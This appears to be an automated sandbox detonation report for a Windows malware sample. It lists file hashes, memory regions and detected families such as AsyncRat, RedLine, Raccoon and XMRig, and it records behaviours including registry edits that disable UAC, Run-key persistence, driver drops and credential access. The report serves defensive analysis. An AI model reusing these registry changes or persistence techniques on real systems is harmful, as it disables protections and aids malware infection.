memory/1028-158-0x0000000000400000-0x0000000000495000-memory.dmp
memory/3048-156-0x0000000000400000-0x0000000000438000-memory.dmp
memory/1796-135-0x0000000000220000-0x0000000000230000-memory.dmp
memory/1796-134-0x0000000000220000-0x0000000000230000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
| MD5 | 78d40b12ffc837843fbf4de2164002f6 |
| SHA1 | 985bdffa69bb915831cd6b81783aef3ae4418f53 |
| SHA256 | 308a15dabdc4ce6b96dd54954a351d304f1fcb59e8c93221ba1c412bcdfd1c44 |
| SHA512 | c6575e1771d37ded4089d963bea95deac78b329ed555c991d7c559ee1970dd0887a965e88c09981529adc9c25df5cfd3d57e3dce6724da1f01f1198f0f460b79 |
memory/1028-148-0x0000000000400000-0x0000000000495000-memory.dmp
memory/2852-140-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2852-138-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1528-124-0x0000000074920000-0x0000000074ECB000-memory.dmp
memory/1904-121-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/1904-120-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/1528-119-0x00000000058E0000-0x0000000005CA2000-memory.dmp
C:\Users\Admin\AppData\Roaming\a.exe
| MD5 | 52cfd35f337ca837d31df0a95ce2a55e |
| SHA1 | 88eb919fa2761f739f02a025e4f9bf1fd340b6ff |
| SHA256 | 5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448 |
| SHA512 | b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73 |
memory/3032-98-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/3032-97-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/3032-95-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/1364-83-0x0000000074920000-0x0000000074ECB000-memory.dmp
C:\Users\Admin\AppData\Roaming\___11.19.exe
| MD5 | a071727b72a8374ff79a695ecde32594 |
| SHA1 | b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc |
| SHA256 | 8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745 |
| SHA512 | 854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400 |
memory/2972-40-0x0000000002490000-0x0000000002590000-memory.dmp
memory/2464-63-0x0000000000400000-0x000000000044F000-memory.dmp
memory/2464-61-0x0000000000400000-0x000000000044F000-memory.dmp
memory/2464-60-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2564-211-0x0000000005080000-0x000000000662A000-memory.dmp
memory/700-241-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/700-257-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Roaming\mediaget.exe
| MD5 | 8eedc01c11b251481dec59e5308dccc3 |
| SHA1 | 24bf069e9f2a1f12aefa391674ed82059386b0aa |
| SHA256 | 0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d |
| SHA512 | 52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc |
C:\Users\Admin\AppData\Local\Temp\HD_X.dat
| MD5 | 696a7236e14e7407b5023681fba1d690 |
| SHA1 | 43c550a8ab63b5f5a2a2622e5f614c4aaeeaf78e |
| SHA256 | af034321362311726b4f39f658d691b7cf2ddf6eccd13f771532abde387f720a |
| SHA512 | 4582231dde50799d1925ba884e6e9d4bfde0a7ca56ee0f9d7bb0ccea18cbb73bda8bdf4de387537ade3d0be5c496f5748346c91806da72f7bf2e0fd814a6d0a0 |
memory/2096-237-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2096-233-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2096-229-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2096-226-0x0000000005FC0000-0x0000000006382000-memory.dmp
C:\ProgramData\kaosdma.txt
| MD5 | 2c807857a435aa8554d595bd14ed35d1 |
| SHA1 | 9003a73beceab3d1b1cd65614347c33117041a95 |
| SHA256 | 3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b |
| SHA512 | 95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9 |
memory/2096-223-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2096-220-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2096-218-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2564-210-0x0000000005080000-0x000000000662A000-memory.dmp
memory/2096-240-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/1536-288-0x00000000002C0000-0x00000000002CC000-memory.dmp
memory/1536-291-0x00000000002D0000-0x00000000002DC000-memory.dmp
memory/1536-290-0x00000000002F0000-0x00000000002FC000-memory.dmp
memory/1536-289-0x00000000002E0000-0x00000000002EA000-memory.dmp
memory/700-209-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/2096-214-0x0000000000400000-0x00000000019AA000-memory.dmp
memory/2232-53-0x0000000000400000-0x0000000000625000-memory.dmp
C:\Users\Admin\AppData\Roaming\test.exe
| MD5 | 7e50b292982932190179245c60c0b59b |
| SHA1 | 25cf641ddcdc818f32837db236a58060426b5571 |
| SHA256 | a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8 |
| SHA512 | c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885 |
memory/1528-13-0x0000000074920000-0x0000000074ECB000-memory.dmp
memory/1528-12-0x0000000074920000-0x0000000074ECB000-memory.dmp
memory/2464-316-0x0000000000400000-0x000000000044F000-memory.dmp
memory/3048-320-0x0000000000400000-0x0000000000434000-memory.dmp
memory/1028-319-0x0000000000400000-0x0000000000491000-memory.dmp
memory/2852-318-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2852-323-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2852-322-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1792-327-0x0000000000AE0000-0x0000000000B74000-memory.dmp
memory/2564-328-0x0000000005080000-0x000000000662A000-memory.dmp
memory/2096-329-0x0000000000400000-0x00000000019AA000-memory.dmp
memory/1528-354-0x0000000001AA0000-0x0000000002020000-memory.dmp
memory/2904-355-0x000000013F3C0000-0x000000013F940000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\259457134.bat
| MD5 | 3880eeb1c736d853eb13b44898b718ab |
| SHA1 | 4eec9d50360cd815211e3c4e6bdd08271b6ec8e6 |
| SHA256 | 936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7 |
| SHA512 | 3eaa3dddd7a11942e75acd44208fbe3d3ff8f4006951cd970fb9ab748c160739409803450d28037e577443504707fc310c634e9dc54d0c25e8cfe6094f017c6b |
memory/2904-397-0x000000013F3C0000-0x000000013F940000-memory.dmp
memory/1528-396-0x0000000001AA0000-0x0000000002020000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-04 19:14
Reported
2024-12-04 19:18
Platform
win10v2004-20241007-en
Max time kernel
143s
Max time network
219s
Command Line
Signatures
AsyncRat
Asyncrat family
Azorult
Azorult family
Blackmoon family
Blackmoon, KrBanker
DcRat
Dcrat family
Detect Blackmoon payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect PurpleFox Rootkit
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fickerstealer
Fickerstealer family
Gh0st RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gh0strat
Gh0strat family
HawkEye
Hawkeye family
NanoCore
Nanocore family
Njrat family
Oski
Oski family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
PurpleFox
Purplefox family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
Redline family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
Xmrig family
njRAT/Bladabindi
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\QAssist.sys | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| File created | C:\Windows\system32\drivers\hitmanpro37.sys | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
| File opened for modification | C:\Windows\system32\drivers\hitmanpro37.sys | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Ö÷¶¯·ÀÓù·þÎñÄ£¿é\Parameters\ServiceDll = "C:\\Windows\\system32\\240629765.txt" | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QAssist\ImagePath = "system32\\DRIVERS\\QAssist.sys" | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\gay.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
Executes dropped EXE
Impair Defenses: Safe Mode Boot
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hitmanpro37 | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hitmanpro37.sys | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | N/A |
| N/A | N/A | C:\Windows\Help\Winlogon.exe | N/A |
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 185.228.168.9 | N/A | N/A |
Uses the VBS compiler for execution
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Program Files (x86)\\Internet Explorer\\fr-FR\\SearchApp.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\schtasks = "\"C:\\Windows\\Resources\\Ease of Access Themes\\schtasks.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\Default User\\winlogon.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Monitor = "C:\\Program Files (x86)\\SCSI Monitor\\scsimon.exe" | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
Indicator Removal: File Deletion
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\240629765.txt | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ini.ini | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| File created | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | C:\Windows\SysWOW64\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\VideoLAN\VLC\vlc.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File created | C:\Program Files (x86)\Internet Explorer\fr-FR\SearchApp.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files (x86)\SCSI Monitor\scsimon.exe | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\SCSI Monitor\scsimon.exe | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File created | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\fr-FR\SearchApp.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files (x86)\Internet Explorer\fr-FR\38384e6a620884a6b69bcc56f80d556f9200171c | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Help\Winlogon.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\active_desktop_render.dll | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Cursors\WUDFhosts.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Windows\Resources\Ease of Access Themes\3a6fe29a7ceee6587669798812d4baccab0fb913 | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Windows\Cursors\KillProcc.sys | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File opened for modification | C:\Windows\Cursors\TrustedInsteller.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\active_desktop_render_New.dll | C:\Windows\SysWOW64\svchost.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
